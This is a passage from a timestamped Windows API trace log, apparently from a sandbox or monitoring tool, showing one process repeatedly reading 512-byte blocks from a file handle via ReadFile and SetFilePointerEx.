dwMoveMethod=0x1ae014 | out: lpNewFilePointer=0x0) returned 1 [0107.636] _get_osfhandle (_FileHandle=4) returned 0x54 [0107.636] ReadFile (in: hFile=0x54, lpBuffer=0x1aee44, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x1ae034, lpOverlapped=0x0 | out: lpBuffer=0x1aee44*, lpNumberOfBytesRead=0x1ae034*=0x200, lpOverlapped=0x0) returned 1 [0107.636] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x1ae014 | out: lpNewFilePointer=0x0) returned 1 [0107.636] _get_osfhandle (_FileHandle=4) returned 0x54 [0107.636] ReadFile (in: hFile=0x54, lpBuffer=0x1aee44, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x1ae034, lpOverlapped=0x0 | out: lpBuffer=0x1aee44*, lpNumberOfBytesRead=0x1ae034*=0x200, lpOverlapped=0x0) returned 1 [0107.636] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x1ae014 | out: lpNewFilePointer=0x0) returned 1 [0107.636] _get_osfhandle (_FileHandle=4) returned 0x54 [0107.636] ReadFile (in: hFile=0x54, lpBuffer=0x1aee44, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x1ae034, lpOverlapped=0x0 | out: lpBuffer=0x1aee44*, lpNumberOfBytesRead=0x1ae034*=0x200, lpOverlapped=0x0) returned 1 [0107.636] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x1ae014 | out: lpNewFilePointer=0x0) returned 1 [0107.636] _get_osfhandle (_FileHandle=4) returned 0x54 [0107.636] ReadFile (in: hFile=0x54, lpBuffer=0x1aee44, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x1ae034, lpOverlapped=0x0 | out: lpBuffer=0x1aee44*, lpNumberOfBytesRead=0x1ae034*=0x200, lpOverlapped=0x0) returned 1 [0107.636] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x1ae014 | out: lpNewFilePointer=0x0) returned 1 [0107.636] _get_osfhandle (_FileHandle=4) returned 0x54 [0107.636] ReadFile (in: hFile=0x54, lpBuffer=0x1aee44, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x1ae034, lpOverlapped=0x0 | out: lpBuffer=0x1aee44*, 
lpNumberOfBytesRead=0x1ae034*=0x200, lpOverlapped=0x0) returned 1 [0107.636] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x1ae014 | out: lpNewFilePointer=0x0) returned 1 [0107.636] _get_osfhandle (_FileHandle=4) returned 0x54 [0107.636] ReadFile (in: hFile=0x54, lpBuffer=0x1aee44, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x1ae034, lpOverlapped=0x0 | out: lpBuffer=0x1aee44*, lpNumberOfBytesRead=0x1ae034*=0x200, lpOverlapped=0x0) returned 1 [0107.637] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x1ae014 | out: lpNewFilePointer=0x0) returned 1 [0107.637] _get_osfhandle (_FileHandle=4) returned 0x54 [0107.637] ReadFile (in: hFile=0x54, lpBuffer=0x1aee44, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x1ae034, lpOverlapped=0x0 | out: lpBuffer=0x1aee44*, lpNumberOfBytesRead=0x1ae034*=0x200, lpOverlapped=0x0) returned 1 [0107.637] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x1ae014 | out: lpNewFilePointer=0x0) returned 1 [0107.637] _get_osfhandle (_FileHandle=4) returned 0x54 [0107.637] ReadFile (in: hFile=0x54, lpBuffer=0x1aee44, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x1ae034, lpOverlapped=0x0 | out: lpBuffer=0x1aee44*, lpNumberOfBytesRead=0x1ae034*=0x200, lpOverlapped=0x0) returned 1 [0107.637] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x1ae014 | out: lpNewFilePointer=0x0) returned 1 [0107.637] _get_osfhandle (_FileHandle=4) returned 0x54 [0107.637] ReadFile (in: hFile=0x54, lpBuffer=0x1aee44, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x1ae034, lpOverlapped=0x0 | out: lpBuffer=0x1aee44*, lpNumberOfBytesRead=0x1ae034*=0x200, lpOverlapped=0x0) returned 1 [0107.637] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x1ae014 | out: lpNewFilePointer=0x0) returned 1 [0107.637] _get_osfhandle (_FileHandle=4) returned 0x54 
[0107.637] ReadFile (in: hFile=0x54, lpBuffer=0x1aee44, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x1ae034, lpOverlapped=0x0 | out: lpBuffer=0x1aee44*, lpNumberOfBytesRead=0x1ae034*=0x200, lpOverlapped=0x0) returned 1 [0107.637] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x1ae014 | out: lpNewFilePointer=0x0) returned 1 [0107.637] _get_osfhandle (_FileHandle=4) returned 0x54 [0107.637] ReadFile (in: hFile=0x54, lpBuffer=0x1aee44, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x1ae034, lpOverlapped=0x0 | out: lpBuffer=0x1aee44*, lpNumberOfBytesRead=0x1ae034*=0x200, lpOverlapped=0x0) returned 1 [0107.637] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x1ae014 | out: lpNewFilePointer=0x0) returned 1 [0107.637] _get_osfhandle (_FileHandle=4) returned 0x54 [0107.637] ReadFile (in: hFile=0x54, lpBuffer=0x1aee44, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x1ae034, lpOverlapped=0x0 | out: lpBuffer=0x1aee44*, lpNumberOfBytesRead=0x1ae034*=0x200, lpOverlapped=0x0) returned 1 [0107.637] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x1ae014 | out: lpNewFilePointer=0x0) returned 1 [0107.638] _get_osfhandle (_FileHandle=4) returned 0x54 [0107.638] ReadFile (in: hFile=0x54, lpBuffer=0x1aee44, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x1ae034, lpOverlapped=0x0 | out: lpBuffer=0x1aee44*, lpNumberOfBytesRead=0x1ae034*=0x200, lpOverlapped=0x0) returned 1 [0107.638] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x1ae014 | out: lpNewFilePointer=0x0) returned 1 [0107.638] _get_osfhandle (_FileHandle=4) returned 0x54 [0107.638] ReadFile (in: hFile=0x54, lpBuffer=0x1aee44, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x1ae034, lpOverlapped=0x0 | out: lpBuffer=0x1aee44*, lpNumberOfBytesRead=0x1ae034*=0x200, lpOverlapped=0x0) returned 1 [0107.638] SetFilePointerEx (in: hFile=0x54, 
liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x1ae014 | out: lpNewFilePointer=0x0) returned 1 [0107.638] _get_osfhandle (_FileHandle=4) returned 0x54 [0107.638] ReadFile (in: hFile=0x54, lpBuffer=0x1aee44, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x1ae034, lpOverlapped=0x0 | out: lpBuffer=0x1aee44*, lpNumberOfBytesRead=0x1ae034*=0x200, lpOverlapped=0x0) returned 1 [0107.638] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x1ae014 | out: lpNewFilePointer=0x0) returned 1 [0107.638] _get_osfhandle (_FileHandle=4) returned 0x54 [0107.638] ReadFile (in: hFile=0x54, lpBuffer=0x1aee44, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x1ae034, lpOverlapped=0x0 | out: lpBuffer=0x1aee44*, lpNumberOfBytesRead=0x1ae034*=0x200, lpOverlapped=0x0) returned 1 [0107.638] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x1ae014 | out: lpNewFilePointer=0x0) returned 1 [0107.638] _get_osfhandle (_FileHandle=4) returned 0x54 [0107.638] ReadFile (in: hFile=0x54, lpBuffer=0x1aee44, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x1ae034, lpOverlapped=0x0 | out: lpBuffer=0x1aee44*, lpNumberOfBytesRead=0x1ae034*=0x200, lpOverlapped=0x0) returned 1 [0107.638] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x1ae014 | out: lpNewFilePointer=0x0) returned 1 [0107.638] _get_osfhandle (_FileHandle=4) returned 0x54 [0107.638] ReadFile (in: hFile=0x54, lpBuffer=0x1aee44, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x1ae034, lpOverlapped=0x0 | out: lpBuffer=0x1aee44*, lpNumberOfBytesRead=0x1ae034*=0x200, lpOverlapped=0x0) returned 1 [0107.638] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x1ae014 | out: lpNewFilePointer=0x0) returned 1 [0107.638] _get_osfhandle (_FileHandle=4) returned 0x54 [0107.638] ReadFile (in: hFile=0x54, lpBuffer=0x1aee44, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x1ae034, 
lpOverlapped=0x0 | out: lpBuffer=0x1aee44*, lpNumberOfBytesRead=0x1ae034*=0x200, lpOverlapped=0x0) returned 1 [0107.639] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x1ae014 | out: lpNewFilePointer=0x0) returned 1 [0107.639] _get_osfhandle (_FileHandle=4) returned 0x54 [0107.639] ReadFile (in: hFile=0x54, lpBuffer=0x1aee44, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x1ae034, lpOverlapped=0x0 | out: lpBuffer=0x1aee44*, lpNumberOfBytesRead=0x1ae034*=0x200, lpOverlapped=0x0) returned 1 [0107.639] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x1ae014 | out: lpNewFilePointer=0x0) returned 1 [0107.639] _get_osfhandle (_FileHandle=4) returned 0x54 [0107.639] ReadFile (in: hFile=0x54, lpBuffer=0x1aee44, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x1ae034, lpOverlapped=0x0 | out: lpBuffer=0x1aee44*, lpNumberOfBytesRead=0x1ae034*=0x200, lpOverlapped=0x0) returned 1 [0107.639] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x1ae014 | out: lpNewFilePointer=0x0) returned 1 [0107.639] _get_osfhandle (_FileHandle=4) returned 0x54 [0107.639] ReadFile (in: hFile=0x54, lpBuffer=0x1aee44, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x1ae034, lpOverlapped=0x0 | out: lpBuffer=0x1aee44*, lpNumberOfBytesRead=0x1ae034*=0x200, lpOverlapped=0x0) returned 1 [0107.639] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x1ae014 | out: lpNewFilePointer=0x0) returned 1 [0107.639] _get_osfhandle (_FileHandle=4) returned 0x54 [0107.639] ReadFile (in: hFile=0x54, lpBuffer=0x1aee44, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x1ae034, lpOverlapped=0x0 | out: lpBuffer=0x1aee44*, lpNumberOfBytesRead=0x1ae034*=0x200, lpOverlapped=0x0) returned 1 [0107.639] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x1ae014 | out: lpNewFilePointer=0x0) returned 1 [0107.639] 
_get_osfhandle (_FileHandle=4) returned 0x54 [0107.639] ReadFile (in: hFile=0x54, lpBuffer=0x1aee44, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x1ae034, lpOverlapped=0x0 | out: lpBuffer=0x1aee44*, lpNumberOfBytesRead=0x1ae034*=0x200, lpOverlapped=0x0) returned 1 [0107.639] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x1ae014 | out: lpNewFilePointer=0x0) returned 1 [0107.639] _get_osfhandle (_FileHandle=4) returned 0x54 [0107.639] ReadFile (in: hFile=0x54, lpBuffer=0x1aee44, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x1ae034, lpOverlapped=0x0 | out: lpBuffer=0x1aee44*, lpNumberOfBytesRead=0x1ae034*=0x200, lpOverlapped=0x0) returned 1 [0107.639] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x1ae014 | out: lpNewFilePointer=0x0) returned 1 [0107.640] _get_osfhandle (_FileHandle=4) returned 0x54 [0107.640] ReadFile (in: hFile=0x54, lpBuffer=0x1aee44, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x1ae034, lpOverlapped=0x0 | out: lpBuffer=0x1aee44*, lpNumberOfBytesRead=0x1ae034*=0x200, lpOverlapped=0x0) returned 1 [0107.640] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x1ae014 | out: lpNewFilePointer=0x0) returned 1 [0107.640] _get_osfhandle (_FileHandle=4) returned 0x54 [0107.640] ReadFile (in: hFile=0x54, lpBuffer=0x1aee44, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x1ae034, lpOverlapped=0x0 | out: lpBuffer=0x1aee44*, lpNumberOfBytesRead=0x1ae034*=0x200, lpOverlapped=0x0) returned 1 [0107.640] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x1ae014 | out: lpNewFilePointer=0x0) returned 1 [0107.640] _get_osfhandle (_FileHandle=4) returned 0x54 [0107.640] ReadFile (in: hFile=0x54, lpBuffer=0x1aee44, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x1ae034, lpOverlapped=0x0 | out: lpBuffer=0x1aee44*, lpNumberOfBytesRead=0x1ae034*=0x200, lpOverlapped=0x0) returned 1 
[0107.640] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x1ae014 | out: lpNewFilePointer=0x0) returned 1 [0107.640] _get_osfhandle (_FileHandle=4) returned 0x54 [0107.640] ReadFile (in: hFile=0x54, lpBuffer=0x1aee44, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x1ae034, lpOverlapped=0x0 | out: lpBuffer=0x1aee44*, lpNumberOfBytesRead=0x1ae034*=0x200, lpOverlapped=0x0) returned 1 [0107.640] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x1ae014 | out: lpNewFilePointer=0x0) returned 1 [0107.640] _get_osfhandle (_FileHandle=4) returned 0x54 [0107.640] ReadFile (in: hFile=0x54, lpBuffer=0x1aee44, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x1ae034, lpOverlapped=0x0 | out: lpBuffer=0x1aee44*, lpNumberOfBytesRead=0x1ae034*=0x200, lpOverlapped=0x0) returned 1 [0107.640] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x1ae014 | out: lpNewFilePointer=0x0) returned 1 [0107.640] _get_osfhandle (_FileHandle=4) returned 0x54 [0107.640] ReadFile (in: hFile=0x54, lpBuffer=0x1aee44, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x1ae034, lpOverlapped=0x0 | out: lpBuffer=0x1aee44*, lpNumberOfBytesRead=0x1ae034*=0x200, lpOverlapped=0x0) returned 1 [0107.640] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x1ae014 | out: lpNewFilePointer=0x0) returned 1 [0107.640] _get_osfhandle (_FileHandle=4) returned 0x54 [0107.640] ReadFile (in: hFile=0x54, lpBuffer=0x1aee44, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x1ae034, lpOverlapped=0x0 | out: lpBuffer=0x1aee44*, lpNumberOfBytesRead=0x1ae034*=0x200, lpOverlapped=0x0) returned 1 [0107.641] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x1ae014 | out: lpNewFilePointer=0x0) returned 1 [0107.641] _get_osfhandle (_FileHandle=4) returned 0x54 [0107.641] ReadFile (in: hFile=0x54, lpBuffer=0x1aee44, 
nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x1ae034, lpOverlapped=0x0 | out: lpBuffer=0x1aee44*, lpNumberOfBytesRead=0x1ae034*=0x200, lpOverlapped=0x0) returned 1 [0107.641] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x1ae014 | out: lpNewFilePointer=0x0) returned 1 [0107.641] _get_osfhandle (_FileHandle=4) returned 0x54 [0107.641] ReadFile (in: hFile=0x54, lpBuffer=0x1aee44, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x1ae034, lpOverlapped=0x0 | out: lpBuffer=0x1aee44*, lpNumberOfBytesRead=0x1ae034*=0x200, lpOverlapped=0x0) returned 1 [0107.641] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x1ae014 | out: lpNewFilePointer=0x0) returned 1 [0107.641] _get_osfhandle (_FileHandle=4) returned 0x54 [0107.641] ReadFile (in: hFile=0x54, lpBuffer=0x1aee44, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x1ae034, lpOverlapped=0x0 | out: lpBuffer=0x1aee44*, lpNumberOfBytesRead=0x1ae034*=0x200, lpOverlapped=0x0) returned 1 [0107.641] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x1ae014 | out: lpNewFilePointer=0x0) returned 1 [0107.641] _get_osfhandle (_FileHandle=4) returned 0x54 [0107.641] ReadFile (in: hFile=0x54, lpBuffer=0x1aee44, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x1ae034, lpOverlapped=0x0 | out: lpBuffer=0x1aee44*, lpNumberOfBytesRead=0x1ae034*=0x200, lpOverlapped=0x0) returned 1 [0107.641] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x1ae014 | out: lpNewFilePointer=0x0) returned 1 [0107.641] _get_osfhandle (_FileHandle=4) returned 0x54 [0107.641] ReadFile (in: hFile=0x54, lpBuffer=0x1aee44, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x1ae034, lpOverlapped=0x0 | out: lpBuffer=0x1aee44*, lpNumberOfBytesRead=0x1ae034*=0x200, lpOverlapped=0x0) returned 1 [0107.641] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, 
dwMoveMethod=0x1ae014 | out: lpNewFilePointer=0x0) returned 1 [0107.641] _get_osfhandle (_FileHandle=4) returned 0x54 [0107.641] ReadFile (in: hFile=0x54, lpBuffer=0x1aee44, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x1ae034, lpOverlapped=0x0 | out: lpBuffer=0x1aee44*, lpNumberOfBytesRead=0x1ae034*=0x200, lpOverlapped=0x0) returned 1 [0107.642] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x1ae014 | out: lpNewFilePointer=0x0) returned 1 [0107.642] _get_osfhandle (_FileHandle=4) returned 0x54 [0107.642] ReadFile (in: hFile=0x54, lpBuffer=0x1aee44, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x1ae034, lpOverlapped=0x0 | out: lpBuffer=0x1aee44*, lpNumberOfBytesRead=0x1ae034*=0x200, lpOverlapped=0x0) returned 1 [0107.642] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x1ae014 | out: lpNewFilePointer=0x0) returned 1 [0107.642] _get_osfhandle (_FileHandle=4) returned 0x54 [0107.642] ReadFile (in: hFile=0x54, lpBuffer=0x1aee44, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x1ae034, lpOverlapped=0x0 | out: lpBuffer=0x1aee44*, lpNumberOfBytesRead=0x1ae034*=0x200, lpOverlapped=0x0) returned 1 [0107.642] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x1ae014 | out: lpNewFilePointer=0x0) returned 1 [0107.642] _get_osfhandle (_FileHandle=4) returned 0x54 [0107.642] ReadFile (in: hFile=0x54, lpBuffer=0x1aee44, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x1ae034, lpOverlapped=0x0 | out: lpBuffer=0x1aee44*, lpNumberOfBytesRead=0x1ae034*=0x200, lpOverlapped=0x0) returned 1 [0107.642] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x1ae014 | out: lpNewFilePointer=0x0) returned 1 [0107.642] _get_osfhandle (_FileHandle=4) returned 0x54 [0107.642] ReadFile (in: hFile=0x54, lpBuffer=0x1aee44, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x1ae034, lpOverlapped=0x0 | out: lpBuffer=0x1aee44*, 
lpNumberOfBytesRead=0x1ae034*=0x200, lpOverlapped=0x0) returned 1 [0107.642] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x1ae014 | out: lpNewFilePointer=0x0) returned 1 [0107.642] _get_osfhandle (_FileHandle=4) returned 0x54 [0107.642] ReadFile (in: hFile=0x54, lpBuffer=0x1aee44, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x1ae034, lpOverlapped=0x0 | out: lpBuffer=0x1aee44*, lpNumberOfBytesRead=0x1ae034*=0x200, lpOverlapped=0x0) returned 1 [0107.642] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x1ae014 | out: lpNewFilePointer=0x0) returned 1 [0107.642] _get_osfhandle (_FileHandle=4) returned 0x54 [0107.642] ReadFile (in: hFile=0x54, lpBuffer=0x1aee44, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x1ae034, lpOverlapped=0x0 | out: lpBuffer=0x1aee44*, lpNumberOfBytesRead=0x1ae034*=0x200, lpOverlapped=0x0) returned 1 [0107.643] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x1ae014 | out: lpNewFilePointer=0x0) returned 1 [0107.643] _get_osfhandle (_FileHandle=4) returned 0x54 [0107.643] ReadFile (in: hFile=0x54, lpBuffer=0x1aee44, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x1ae034, lpOverlapped=0x0 | out: lpBuffer=0x1aee44*, lpNumberOfBytesRead=0x1ae034*=0x200, lpOverlapped=0x0) returned 1 [0107.643] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x1ae014 | out: lpNewFilePointer=0x0) returned 1 [0107.643] _get_osfhandle (_FileHandle=4) returned 0x54 [0107.643] ReadFile (in: hFile=0x54, lpBuffer=0x1aee44, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x1ae034, lpOverlapped=0x0 | out: lpBuffer=0x1aee44*, lpNumberOfBytesRead=0x1ae034*=0x200, lpOverlapped=0x0) returned 1 [0107.643] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x1ae014 | out: lpNewFilePointer=0x0) returned 1 [0107.643] _get_osfhandle (_FileHandle=4) returned 0x54 
[0107.643] ReadFile (in: hFile=0x54, lpBuffer=0x1aee44, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x1ae034, lpOverlapped=0x0 | out: lpBuffer=0x1aee44*, lpNumberOfBytesRead=0x1ae034*=0x200, lpOverlapped=0x0) returned 1 [0107.643] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x1ae014 | out: lpNewFilePointer=0x0) returned 1 [0107.643] _get_osfhandle (_FileHandle=4) returned 0x54 [0107.643] ReadFile (in: hFile=0x54, lpBuffer=0x1aee44, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x1ae034, lpOverlapped=0x0 | out: lpBuffer=0x1aee44*, lpNumberOfBytesRead=0x1ae034*=0x200, lpOverlapped=0x0) returned 1 [0107.643] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x1ae014 | out: lpNewFilePointer=0x0) returned 1 [0107.643] _get_osfhandle (_FileHandle=4) returned 0x54 [0107.643] ReadFile (in: hFile=0x54, lpBuffer=0x1aee44, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x1ae034, lpOverlapped=0x0 | out: lpBuffer=0x1aee44*, lpNumberOfBytesRead=0x1ae034*=0x200, lpOverlapped=0x0) returned 1 [0107.643] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x1ae014 | out: lpNewFilePointer=0x0) returned 1 [0107.643] _get_osfhandle (_FileHandle=4) returned 0x54 [0107.643] ReadFile (in: hFile=0x54, lpBuffer=0x1aee44, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x1ae034, lpOverlapped=0x0 | out: lpBuffer=0x1aee44*, lpNumberOfBytesRead=0x1ae034*=0x200, lpOverlapped=0x0) returned 1 [0107.643] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x1ae014 | out: lpNewFilePointer=0x0) returned 1 [0107.643] _get_osfhandle (_FileHandle=4) returned 0x54 [0107.644] ReadFile (in: hFile=0x54, lpBuffer=0x1aee44, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x1ae034, lpOverlapped=0x0 | out: lpBuffer=0x1aee44*, lpNumberOfBytesRead=0x1ae034*=0x200, lpOverlapped=0x0) returned 1 [0107.644] SetFilePointerEx (in: hFile=0x54, 
liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x1ae014 | out: lpNewFilePointer=0x0) returned 1 [0107.644] _get_osfhandle (_FileHandle=4) returned 0x54 [0107.644] ReadFile (in: hFile=0x54, lpBuffer=0x1aee44, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x1ae034, lpOverlapped=0x0 | out: lpBuffer=0x1aee44*, lpNumberOfBytesRead=0x1ae034*=0x200, lpOverlapped=0x0) returned 1 [0107.644] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x1ae014 | out: lpNewFilePointer=0x0) returned 1 [0107.644] _get_osfhandle (_FileHandle=4) returned 0x54 [0107.644] ReadFile (in: hFile=0x54, lpBuffer=0x1aee44, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x1ae034, lpOverlapped=0x0 | out: lpBuffer=0x1aee44*, lpNumberOfBytesRead=0x1ae034*=0x200, lpOverlapped=0x0) returned 1 [0107.644] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x1ae014 | out: lpNewFilePointer=0x0) returned 1 [0107.644] _get_osfhandle (_FileHandle=4) returned 0x54 [0107.644] ReadFile (in: hFile=0x54, lpBuffer=0x1aee44, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x1ae034, lpOverlapped=0x0 | out: lpBuffer=0x1aee44*, lpNumberOfBytesRead=0x1ae034*=0x200, lpOverlapped=0x0) returned 1 [0107.644] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x1ae014 | out: lpNewFilePointer=0x0) returned 1 [0107.644] _get_osfhandle (_FileHandle=4) returned 0x54 [0107.644] ReadFile (in: hFile=0x54, lpBuffer=0x1aee44, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x1ae034, lpOverlapped=0x0 | out: lpBuffer=0x1aee44*, lpNumberOfBytesRead=0x1ae034*=0x200, lpOverlapped=0x0) returned 1 [0107.644] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x1ae014 | out: lpNewFilePointer=0x0) returned 1 [0107.644] _get_osfhandle (_FileHandle=4) returned 0x54 [0107.644] ReadFile (in: hFile=0x54, lpBuffer=0x1aee44, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x1ae034, 
